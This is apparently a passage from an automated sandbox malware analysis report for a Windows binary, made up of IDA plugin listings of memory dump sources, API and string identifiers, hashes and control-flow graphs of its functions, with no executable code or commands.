                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
                                                                                                                • String ID: content$directory_iterator::directory_iterator$exists$filename$status
                                                                                                                • API String ID: 1254564140-3429737954
                                                                                                                • Opcode ID: 1546580674866f4c82a63006c8ab545a023558855833896973cb62ed33a32a99
                                                                                                                • Instruction ID: 33b0860d4ee2b8d0fdeb6099f8e6bd2a46ddd9efe9c434224126fda0810e5dd9
                                                                                                                • Opcode Fuzzy Hash: 1546580674866f4c82a63006c8ab545a023558855833896973cb62ed33a32a99
                                                                                                                • Instruction Fuzzy Hash: 9AE26172A18BC58AEB218F24D8903ED7375FB85798F505325EA6C4BAD9EF78D644C300

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 800 7ff6f1db6350-7ff6f1db69ee call 7ff6f1d7d4e0 call 7ff6f1d7d370 808 7ff6f1db69f0-7ff6f1db69f7 800->808 808->808 809 7ff6f1db69f9-7ff6f1dba9b7 call 7ff6f1da5c20 call 7ff6f1d7d810 call 7ff6f1d7eaf0 call 7ff6f1d7e240 call 7ff6f1de8254 * 3 call 7ff6f1d7e1d0 call 7ff6f1de8254 call 7ff6f1d939b0 call 7ff6f1d979f0 call 7ff6f1d97ac0 call 7ff6f1e00e88 call 7ff6f1de8254 * 2 call 7ff6f1d7cf70 call 7ff6f1d7e0c0 call 7ff6f1d7e1d0 call 7ff6f1d7e240 call 7ff6f1de8254 call 7ff6f1d7e1d0 * 2 call 7ff6f1de8254 call 7ff6f1d939b0 call 7ff6f1d979f0 call 7ff6f1d97ac0 call 7ff6f1e00e88 call 7ff6f1de8254 call 7ff6f1d7e0c0 call 7ff6f1d7cf70 call 7ff6f1de8254 call 7ff6f1d7e240 call 7ff6f1de8254 * 3 call 7ff6f1d7e1d0 call 7ff6f1de8254 call 7ff6f1d939b0 call 7ff6f1d979f0 call 7ff6f1d97ac0 call 7ff6f1e00e88 call 7ff6f1de8254 * 2 call 7ff6f1d7cf70 call 7ff6f1d7e0c0 call 7ff6f1d7e1d0 call 7ff6f1d7e240 call 7ff6f1d7e1d0 * 4 call 7ff6f1d7cf70 call 7ff6f1d7e1d0 * 3 call 7ff6f1d7cf70 call 7ff6f1de8254 * 3 call 7ff6f1dd0040 call 7ff6f1e11650 GetModuleFileNameW 808->809 939 7ff6f1dba9c0-7ff6f1dba9c9 809->939 939->939 940 7ff6f1dba9cb-7ff6f1dbabde call 7ff6f1d86940 939->940 943 7ff6f1dbabe1-7ff6f1dbabea 940->943 943->943 944 7ff6f1dbabec-7ff6f1dbae7d call 7ff6f1d86940 call 7ff6f1d86bd0 call 7ff6f1d95fd0 943->944 954 7ff6f1dbae80-7ff6f1dbae89 944->954 954->954 955 7ff6f1dbae8b-7ff6f1dbb11e call 7ff6f1d86940 call 7ff6f1d86bd0 call 7ff6f1d95fd0 954->955 965 7ff6f1dbb121-7ff6f1dbb12a 955->965 965->965 966 7ff6f1dbb12c-7ff6f1dbb600 call 7ff6f1d86940 call 7ff6f1d7d4a0 call 7ff6f1d95fd0 965->966 979 7ff6f1dbb603-7ff6f1dbb60c 966->979 979->979 980 7ff6f1dbb60e-7ff6f1dbb8bd call 7ff6f1d86940 call 7ff6f1d86bd0 call 7ff6f1d95fd0 979->980 990 7ff6f1dbb8c0-7ff6f1dbb8c9 980->990 990->990 991 7ff6f1dbb8cb-7ff6f1dbbb70 call 7ff6f1d86940 call 7ff6f1d86bd0 call 7ff6f1d95fd0 990->991 1001 7ff6f1dbbb73-7ff6f1dbbb7c 991->1001 1001->1001 1002 7ff6f1dbbb7e-7ff6f1dbbd8b call 7ff6f1d86940 call 7ff6f1d86bd0 call 7ff6f1d95fd0 1001->1002 1012 7ff6f1dbbd90-7ff6f1dbbd99 1002->1012 1012->1012 1013 7ff6f1dbbd9b-7ff6f1dbc0c7 call 7ff6f1d86940 call 7ff6f1d86bd0 call 7ff6f1d95fd0 1012->1013 1023 7ff6f1dbc0d0-7ff6f1dbc0d8 1013->1023 1023->1023 1024 7ff6f1dbc0da-7ff6f1dbc326 call 7ff6f1d86940 call 7ff6f1d86bd0 call 7ff6f1d95fd0 call 7ff6f1d7cf70 call 7ff6f1db5d70 1023->1024
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __std_fs_convert_wide_to_narrow$__std_fs_code_page
                                                                                                                • String ID: cannot use push_back() with $directory_iterator::directory_iterator$exists$recursive_directory_iterator::operator++$recursive_directory_iterator::recursive_directory_iterator$status
                                                                                                                • API String ID: 3645842244-1862120484
                                                                                                                • Opcode ID: de5a621f2f067d1123de94e788919e3c44fbe91b6b887da37095cf4d544f4034
                                                                                                                • Instruction ID: 95c14edc7cbd31f1221faf3afb573f4dd9dbef066b1823c2f15052762331f2e4
                                                                                                                • Opcode Fuzzy Hash: de5a621f2f067d1123de94e788919e3c44fbe91b6b887da37095cf4d544f4034
                                                                                                                • Instruction Fuzzy Hash: 7AD2247291DBC985D7708B19F4812AAB3A0FB99784F405325EADD93B99EF3CD254CB00

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$DeleteMetricsSystem$CreateSelectStream_$CapsCompatibleCriticalDeviceReleaseSection$BitmapEnterLeaveReadResetSizeStream
                                                                                                                • String ID:
                                                                                                                • API String ID: 3214587331-3916222277
                                                                                                                • Opcode ID: 312cd4efce3d3f241b15748fa518ee44aaca86f0cd571cabb29f5cbe721ad1f9
                                                                                                                • Instruction ID: 2d7cba36d9106442e90aea6b295cdd69a0a29450ab69abdf96071ae96ce109dc
                                                                                                                • Opcode Fuzzy Hash: 312cd4efce3d3f241b15748fa518ee44aaca86f0cd571cabb29f5cbe721ad1f9
                                                                                                                • Instruction Fuzzy Hash: 5EB15672A08BC186E760DF21E8547AAB7A5FB89BD0F405535DA9E83795EF3CD044CB40

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1078 7ff6f1d8d570-7ff6f1d8d66f LoadLibraryA 1079 7ff6f1d8e530-7ff6f1d8e53a 1078->1079 1080 7ff6f1d8d675-7ff6f1d8da30 GetProcAddress * 6 1078->1080 1082 7ff6f1d8e549-7ff6f1d8e54c 1079->1082 1083 7ff6f1d8e53c-7ff6f1d8e53e 1079->1083 1080->1079 1081 7ff6f1d8da36-7ff6f1d8da39 1080->1081 1081->1079 1086 7ff6f1d8da3f-7ff6f1d8da42 1081->1086 1084 7ff6f1d8e54e-7ff6f1d8e551 FreeLibrary 1082->1084 1085 7ff6f1d8e557-7ff6f1d8e586 call 7ff6f1dfe860 1082->1085 1083->1082 1084->1085 1086->1079 1089 7ff6f1d8da48-7ff6f1d8da4b 1086->1089 1089->1079 1091 7ff6f1d8da51-7ff6f1d8da54 1089->1091 1091->1079 1092 7ff6f1d8da5a-7ff6f1d8da5d 1091->1092 1092->1079 1093 7ff6f1d8da63-7ff6f1d8da71 1092->1093 1094 7ff6f1d8da75-7ff6f1d8da77 1093->1094 1094->1079 1095 7ff6f1d8da7d-7ff6f1d8da89 1094->1095 1095->1079 1096 7ff6f1d8da8f-7ff6f1d8da98 1095->1096 1097 7ff6f1d8daa0-7ff6f1d8dabb 1096->1097 1099 7ff6f1d8dac1-7ff6f1d8dadf 1097->1099 1100 7ff6f1d8e517-7ff6f1d8e523 1097->1100 1099->1100 1103 7ff6f1d8dae5-7ff6f1d8daf7 1099->1103 1100->1097 1101 7ff6f1d8e529 1100->1101 1101->1079 1104 7ff6f1d8e503-7ff6f1d8e512 1103->1104 1105 7ff6f1d8dafd 1103->1105 1104->1100 1106 7ff6f1d8db02-7ff6f1d8db53 call 7ff6f1dfe888 1105->1106 1111 7ff6f1d8ddd2 1106->1111 1112 7ff6f1d8db59-7ff6f1d8db60 1106->1112 1114 7ff6f1d8ddd4-7ff6f1d8dddb 1111->1114 1112->1111 1113 7ff6f1d8db66-7ff6f1d8dc5f call 7ff6f1dc78f0 call 7ff6f1d95310 call 7ff6f1d955e0 1112->1113 1139 7ff6f1d8dc60-7ff6f1d8dc68 1113->1139 1116 7ff6f1d8e051-7ff6f1d8e08d 1114->1116 1117 7ff6f1d8dde1-7ff6f1d8dde8 1114->1117 1125 7ff6f1d8e093-7ff6f1d8e0a1 1116->1125 1126 7ff6f1d8e327-7ff6f1d8e329 1116->1126 1117->1116 1119 7ff6f1d8ddee-7ff6f1d8dedb call 7ff6f1dc78f0 call 7ff6f1d95310 call 7ff6f1d955e0 1117->1119 1151 7ff6f1d8dee2-7ff6f1d8deea 1119->1151 1129 7ff6f1d8e320-7ff6f1d8e323 1125->1129 1130 7ff6f1d8e0a7-7ff6f1d8e0ae 1125->1130 1131 7ff6f1d8e32f-7ff6f1d8e458 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1dfe888 call 7ff6f1db51b0 1126->1131 1132 7ff6f1d8e4d5-7ff6f1d8e4eb call 7ff6f1d900f0 1126->1132 1129->1126 1135 7ff6f1d8e325 1129->1135 1130->1129 1137 7ff6f1d8e0b4-7ff6f1d8e1a8 call 7ff6f1dc78f0 call 7ff6f1d95310 call 7ff6f1d955e0 1130->1137 1221 7ff6f1d8e464-7ff6f1d8e477 call 7ff6f1d937f0 1131->1221 1222 7ff6f1d8e45a-7ff6f1d8e45c 1131->1222 1146 7ff6f1d8db00 1132->1146 1147 7ff6f1d8e4f1-7ff6f1d8e4fc 1132->1147 1135->1126 1168 7ff6f1d8e1b0-7ff6f1d8e1b7 1137->1168 1139->1139 1144 7ff6f1d8dc6a-7ff6f1d8dcc4 call 7ff6f1d986b0 call 7ff6f1d96bc0 call 7ff6f1d93ff0 1139->1144 1175 7ff6f1d8dcc6-7ff6f1d8dcd7 1144->1175 1176 7ff6f1d8dcf7-7ff6f1d8dd21 1144->1176 1146->1106 1147->1104 1151->1151 1155 7ff6f1d8deec-7ff6f1d8df45 call 7ff6f1d986b0 call 7ff6f1d96bc0 call 7ff6f1d93ff0 1151->1155 1193 7ff6f1d8df47-7ff6f1d8df58 1155->1193 1194 7ff6f1d8df78-7ff6f1d8dfa2 1155->1194 1168->1168 1172 7ff6f1d8e1b9-7ff6f1d8e212 call 7ff6f1d986b0 call 7ff6f1d96bc0 call 7ff6f1d93ff0 1168->1172 1233 7ff6f1d8e214-7ff6f1d8e225 1172->1233 1234 7ff6f1d8e245-7ff6f1d8e26e 1172->1234 1182 7ff6f1d8dcf2 call 7ff6f1dfe880 1175->1182 1183 7ff6f1d8dcd9-7ff6f1d8dcec 1175->1183 1179 7ff6f1d8dd23-7ff6f1d8dd37 1176->1179 1180 7ff6f1d8dd59-7ff6f1d8dd7f 1176->1180 1186 7ff6f1d8dd52-7ff6f1d8dd57 call 7ff6f1dfe880 1179->1186 1187 7ff6f1d8dd39-7ff6f1d8dd4c 1179->1187 1189 7ff6f1d8dd81-7ff6f1d8dd95 1180->1189 1190 7ff6f1d8ddb7-7ff6f1d8ddd0 1180->1190 1182->1176 1183->1182 1191 7ff6f1d8e5e1-7ff6f1d8e5e6 call 7ff6f1de8254 1183->1191 1186->1180 1187->1186 1197 7ff6f1d8e5e7-7ff6f1d8e5ec call 7ff6f1de8254 1187->1197 1203 7ff6f1d8ddb0-7ff6f1d8ddb5 call 7ff6f1dfe880 1189->1203 1204 7ff6f1d8dd97-7ff6f1d8ddaa 1189->1204 1190->1114 1191->1197 1205 7ff6f1d8df73 call 7ff6f1dfe880 1193->1205 1206 7ff6f1d8df5a-7ff6f1d8df6d 1193->1206 1200 7ff6f1d8dfa4-7ff6f1d8dfb8 1194->1200 1201 7ff6f1d8dfda-7ff6f1d8e000 1194->1201 1215 7ff6f1d8e5ed-7ff6f1d8e5f2 call 7ff6f1de8254 1197->1215 1212 7ff6f1d8dfd3-7ff6f1d8dfd8 call 7ff6f1dfe880 1200->1212 1213 7ff6f1d8dfba-7ff6f1d8dfcd 1200->1213 1217 7ff6f1d8e002-7ff6f1d8e016 1201->1217 1218 7ff6f1d8e038-7ff6f1d8e04a 1201->1218 1203->1190 1204->1203 1204->1215 1205->1194 1206->1205 1207 7ff6f1d8e5f3-7ff6f1d8e5f8 call 7ff6f1de8254 1206->1207 1223 7ff6f1d8e5f9-7ff6f1d8e5fe call 7ff6f1de8254 1207->1223 1212->1201 1213->1212 1213->1223 1215->1207 1225 7ff6f1d8e031-7ff6f1d8e036 call 7ff6f1dfe880 1217->1225 1226 7ff6f1d8e018-7ff6f1d8e02b 1217->1226 1218->1116 1246 7ff6f1d8e47b-7ff6f1d8e487 1221->1246 1235 7ff6f1d8e462 1222->1235 1236 7ff6f1d8e58d-7ff6f1d8e5da call 7ff6f1d939b0 call 7ff6f1d979f0 call 7ff6f1d97ac0 call 7ff6f1e00e88 1222->1236 1239 7ff6f1d8e5ff-7ff6f1d8e604 call 7ff6f1de8254 1223->1239 1225->1218 1226->1225 1226->1239 1243 7ff6f1d8e240 call 7ff6f1dfe880 1233->1243 1244 7ff6f1d8e227-7ff6f1d8e23a 1233->1244 1247 7ff6f1d8e270-7ff6f1d8e284 1234->1247 1248 7ff6f1d8e2a4-7ff6f1d8e2ca 1234->1248 1235->1246 1276 7ff6f1d8e5db-7ff6f1d8e5e0 call 7ff6f1de8254 1236->1276 1252 7ff6f1d8e605-7ff6f1d8e60a call 7ff6f1de8254 1239->1252 1243->1234 1244->1243 1244->1252 1257 7ff6f1d8e4ae-7ff6f1d8e4b8 call 7ff6f1da0610 1246->1257 1258 7ff6f1d8e489-7ff6f1d8e4ac 1246->1258 1255 7ff6f1d8e29f call 7ff6f1dfe880 1247->1255 1256 7ff6f1d8e286-7ff6f1d8e299 1247->1256 1260 7ff6f1d8e300-7ff6f1d8e319 1248->1260 1261 7ff6f1d8e2cc-7ff6f1d8e2e0 1248->1261 1255->1248 1256->1255 1263 7ff6f1d8e587-7ff6f1d8e58c call 7ff6f1de8254 1256->1263 1265 7ff6f1d8e4bd-7ff6f1d8e4ce call 7ff6f1d93ff0 1257->1265 1258->1265 1260->1129 1268 7ff6f1d8e2e2-7ff6f1d8e2f5 1261->1268 1269 7ff6f1d8e2fb call 7ff6f1dfe880 1261->1269 1263->1236 1265->1132 1268->1269 1268->1276 1269->1260 1276->1191
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$AddressProc$Library$FreeLoad
                                                                                                                • String ID: cannot use push_back() with $system$vault
                                                                                                                • API String ID: 2463004387-1741236777
                                                                                                                • Opcode ID: 732ce1a3913aa3f176137871251050bb418a6a7d07714671249ce45bbf4a0681
                                                                                                                • Instruction ID: 1e59a9550c694a66e07a1503dcbb21c0bb92f0898c3aeb8d8545666b8b49b249
                                                                                                                • Opcode Fuzzy Hash: 732ce1a3913aa3f176137871251050bb418a6a7d07714671249ce45bbf4a0681
                                                                                                                • Instruction Fuzzy Hash: 86926132609BC58ADB608F25E8943ED73B4F749798F504225DB9C8BB99EF78D644C700

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1285 7ff6f1d82ca0-7ff6f1d82d72 1286 7ff6f1d82d75-7ff6f1d82d7c 1285->1286 1286->1286 1287 7ff6f1d82d7e-7ff6f1d82efe call 7ff6f1d986b0 1286->1287 1290 7ff6f1d82f01-7ff6f1d82f09 1287->1290 1290->1290 1291 7ff6f1d82f0b-7ff6f1d82f93 call 7ff6f1d986b0 1290->1291 1294 7ff6f1d82f96-7ff6f1d82f9e 1291->1294 1294->1294 1295 7ff6f1d82fa0-7ff6f1d8302a call 7ff6f1d986b0 RegOpenKeyExA 1294->1295 1298 7ff6f1d83030-7ff6f1d83072 RegQueryValueExA 1295->1298 1299 7ff6f1d830ee-7ff6f1d830f5 1295->1299 1298->1299 1300 7ff6f1d83074-7ff6f1d830b2 call 7ff6f1d986b0 call 7ff6f1d928e0 1298->1300 1301 7ff6f1d830fd-7ff6f1d83168 call 7ff6f1da5c20 1299->1301 1302 7ff6f1d830f7 RegCloseKey 1299->1302 1318 7ff6f1d830e5-7ff6f1d830ea 1300->1318 1319 7ff6f1d830b4-7ff6f1d830c5 1300->1319 1307 7ff6f1d8319c-7ff6f1d831af 1301->1307 1308 7ff6f1d8316a-7ff6f1d8317c 1301->1308 1302->1301 1312 7ff6f1d8382b-7ff6f1d83836 1307->1312 1313 7ff6f1d831b5-7ff6f1d831f5 call 7ff6f1d7eaf0 1307->1313 1310 7ff6f1d83197 call 7ff6f1dfe880 1308->1310 1311 7ff6f1d8317e-7ff6f1d83191 1308->1311 1310->1307 1311->1310 1315 7ff6f1d839d1-7ff6f1d839d6 call 7ff6f1de8254 1311->1315 1320 7ff6f1d83838-7ff6f1d8384e 1312->1320 1321 7ff6f1d8386e-7ff6f1d83890 1312->1321 1336 7ff6f1d831fb-7ff6f1d831fe 1313->1336 1337 7ff6f1d839a7-7ff6f1d839a9 1313->1337 1341 7ff6f1d839d7-7ff6f1d839e9 call 7ff6f1d7e1d0 1315->1341 1318->1299 1325 7ff6f1d830c7-7ff6f1d830da 1319->1325 1326 7ff6f1d830e0 call 7ff6f1dfe880 1319->1326 1327 7ff6f1d83869 call 7ff6f1dfe880 1320->1327 1328 7ff6f1d83850-7ff6f1d83863 1320->1328 1322 7ff6f1d838c6-7ff6f1d838e0 1321->1322 1323 7ff6f1d83892-7ff6f1d838a6 1321->1323 1334 7ff6f1d83916-7ff6f1d83930 1322->1334 1335 7ff6f1d838e2-7ff6f1d838f6 1322->1335 1332 7ff6f1d838a8-7ff6f1d838bb 1323->1332 1333 7ff6f1d838c1 call 7ff6f1dfe880 1323->1333 1325->1326 1338 7ff6f1d839cb-7ff6f1d839d0 call 7ff6f1de8254 1325->1338 1326->1318 1327->1321 1328->1327 1340 7ff6f1d839f0-7ff6f1d839f5 call 7ff6f1de8254 1328->1340 1332->1333 1342 7ff6f1d83a1e-7ff6f1d83a23 call 7ff6f1de8254 1332->1342 1333->1322 1350 7ff6f1d83962-7ff6f1d839a6 call 7ff6f1dfe860 1334->1350 1351 7ff6f1d83932-7ff6f1d83946 1334->1351 1346 7ff6f1d838f8-7ff6f1d8390b 1335->1346 1347 7ff6f1d83911 call 7ff6f1dfe880 1335->1347 1336->1312 1349 7ff6f1d83204-7ff6f1d8322b call 7ff6f1d7d020 1336->1349 1343 7ff6f1d839ab 1337->1343 1344 7ff6f1d839b6-7ff6f1d839ca call 7ff6f1d7e240 1337->1344 1338->1315 1367 7ff6f1d839f6-7ff6f1d83a05 call 7ff6f1d7e1d0 1340->1367 1373 7ff6f1d839ea-7ff6f1d839ef call 7ff6f1de8254 1341->1373 1356 7ff6f1d83a24-7ff6f1d83a29 call 7ff6f1de8254 1342->1356 1343->1312 1344->1338 1346->1347 1346->1356 1347->1334 1376 7ff6f1d8322d 1349->1376 1377 7ff6f1d8329c-7ff6f1d83305 call 7ff6f1d86940 call 7ff6f1d95140 1349->1377 1361 7ff6f1d8395d call 7ff6f1dfe880 1351->1361 1362 7ff6f1d83948-7ff6f1d8395b 1351->1362 1361->1350 1362->1361 1371 7ff6f1d839b0-7ff6f1d839b5 call 7ff6f1de8254 1362->1371 1385 7ff6f1d83a06-7ff6f1d83a0b call 7ff6f1de8254 1367->1385 1371->1344 1373->1340 1383 7ff6f1d83230-7ff6f1d83237 1376->1383 1377->1341 1396 7ff6f1d8330b-7ff6f1d8331a 1377->1396 1387 7ff6f1d83239-7ff6f1d8323d 1383->1387 1388 7ff6f1d8323f-7ff6f1d83246 1383->1388 1395 7ff6f1d83a0c-7ff6f1d83a11 call 7ff6f1de8254 1385->1395 1387->1388 1389 7ff6f1d83248-7ff6f1d8324b 1387->1389 1388->1383 1388->1389 1389->1377 1393 7ff6f1d8324d 1389->1393 1397 7ff6f1d83250-7ff6f1d8325c 1393->1397 1410 7ff6f1d83a12-7ff6f1d83a17 call 7ff6f1de8254 1395->1410 1399 7ff6f1d8331c-7ff6f1d83332 1396->1399 1400 7ff6f1d83352-7ff6f1d83382 1396->1400 1401 7ff6f1d8326e-7ff6f1d83271 1397->1401 1402 7ff6f1d8325e-7ff6f1d83262 1397->1402 1404 7ff6f1d8334d call 7ff6f1dfe880 1399->1404 1405 7ff6f1d83334-7ff6f1d83347 1399->1405 1407 7ff6f1d8338c-7ff6f1d833cb call 7ff6f1d7e8c0 1400->1407 1408 7ff6f1d83384-7ff6f1d83388 1400->1408 1401->1377 1409 7ff6f1d83273-7ff6f1d83277 1401->1409 1402->1401 1406 7ff6f1d83264-7ff6f1d8326a 1402->1406 1404->1400 1405->1373 1405->1404 1406->1397 1412 7ff6f1d8326c 1406->1412 1420 7ff6f1d833cd-7ff6f1d833d6 1407->1420 1421 7ff6f1d833da-7ff6f1d83404 call 7ff6f1d7e9a0 1407->1421 1408->1407 1414 7ff6f1d83280-7ff6f1d8328c 1409->1414 1422 7ff6f1d83a18-7ff6f1d83a1d call 7ff6f1d7cf70 1410->1422 1412->1377 1417 7ff6f1d83294-7ff6f1d8329a 1414->1417 1418 7ff6f1d8328e-7ff6f1d83292 1414->1418 1417->1377 1417->1414 1418->1377 1418->1417 1420->1421 1427 7ff6f1d8340a 1421->1427 1428 7ff6f1d83789-7ff6f1d83793 1421->1428 1422->1342 1429 7ff6f1d83410-7ff6f1d83431 call 7ff6f1d7eaf0 1427->1429 1430 7ff6f1d83795-7ff6f1d8379f 1428->1430 1431 7ff6f1d837bf-7ff6f1d837c9 1428->1431 1439 7ff6f1d83433-7ff6f1d8343b 1429->1439 1440 7ff6f1d83441-7ff6f1d83444 1429->1440 1430->1431 1433 7ff6f1d837a1-7ff6f1d837b3 1430->1433 1434 7ff6f1d837cb-7ff6f1d837d5 1431->1434 1435 7ff6f1d837f5-7ff6f1d837fc 1431->1435 1433->1431 1446 7ff6f1d837b5-7ff6f1d837be 1433->1446 1434->1435 1438 7ff6f1d837d7-7ff6f1d837e9 1434->1438 1435->1312 1437 7ff6f1d837fe-7ff6f1d83808 1435->1437 1437->1312 1441 7ff6f1d8380a-7ff6f1d8381e 1437->1441 1438->1435 1447 7ff6f1d837eb-7ff6f1d837f4 1438->1447 1439->1367 1439->1440 1444 7ff6f1d8344a-7ff6f1d83461 call 7ff6f1dcf8f0 1440->1444 1445 7ff6f1d83769-7ff6f1d83783 call 7ff6f1d7e7b0 1440->1445 1441->1312 1453 7ff6f1d83820-7ff6f1d8382a 1441->1453 1456 7ff6f1d8375d-7ff6f1d83764 call 7ff6f1d7f380 1444->1456 1457 7ff6f1d83467-7ff6f1d834b0 call 7ff6f1d93a40 call 7ff6f1d7d4e0 call 7ff6f1d7d370 1444->1457 1445->1428 1445->1429 1446->1431 1447->1435 1453->1312 1456->1445 1466 7ff6f1d834b5-7ff6f1d83554 call 7ff6f1d95310 call 7ff6f1d955e0 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 1457->1466 1467 7ff6f1d834b2 1457->1467 1478 7ff6f1d83587-7ff6f1d8359f 1466->1478 1479 7ff6f1d83556-7ff6f1d83567 1466->1479 1467->1466 1480 7ff6f1d835d2-7ff6f1d835ea 1478->1480 1481 7ff6f1d835a1-7ff6f1d835b2 1478->1481 1482 7ff6f1d83569-7ff6f1d8357c 1479->1482 1483 7ff6f1d83582 call 7ff6f1dfe880 1479->1483 1486 7ff6f1d835ec-7ff6f1d83602 1480->1486 1487 7ff6f1d83622-7ff6f1d83643 1480->1487 1484 7ff6f1d835cd call 7ff6f1dfe880 1481->1484 1485 7ff6f1d835b4-7ff6f1d835c7 1481->1485 1482->1385 1482->1483 1483->1478 1484->1480 1485->1395 1485->1484 1490 7ff6f1d8361d call 7ff6f1dfe880 1486->1490 1491 7ff6f1d83604-7ff6f1d83617 1486->1491 1487->1422 1492 7ff6f1d83649-7ff6f1d8375c call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1d929b0 call 7ff6f1d91900 call 7ff6f1d929b0 call 7ff6f1d91900 call 7ff6f1d917a0 call 7ff6f1d93ff0 1487->1492 1490->1487 1491->1410 1491->1490 1492->1456
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
                                                                                                                • String ID: content$directory_iterator::directory_iterator$exists$filename$status
                                                                                                                • API String ID: 1254564140-3429737954
                                                                                                                • Opcode ID: 7d1c13afdd55cbf7c0d85b4a73c477f2369bae206a74cf1323a5b3af0f6657ea
                                                                                                                • Instruction ID: 7a5cba5dc03c25bb822d0dd9b4d68fe294b292d08ea8027891a210a2d07b54e3
                                                                                                                • Opcode Fuzzy Hash: 7d1c13afdd55cbf7c0d85b4a73c477f2369bae206a74cf1323a5b3af0f6657ea
                                                                                                                • Instruction Fuzzy Hash: 69827E72A19BC58ADB208F25D8803ED73B1FB89798F545325EAAD47B99EF38D544C300

                                                                                                                Control-flow Graph

                                                                                                                • Executed
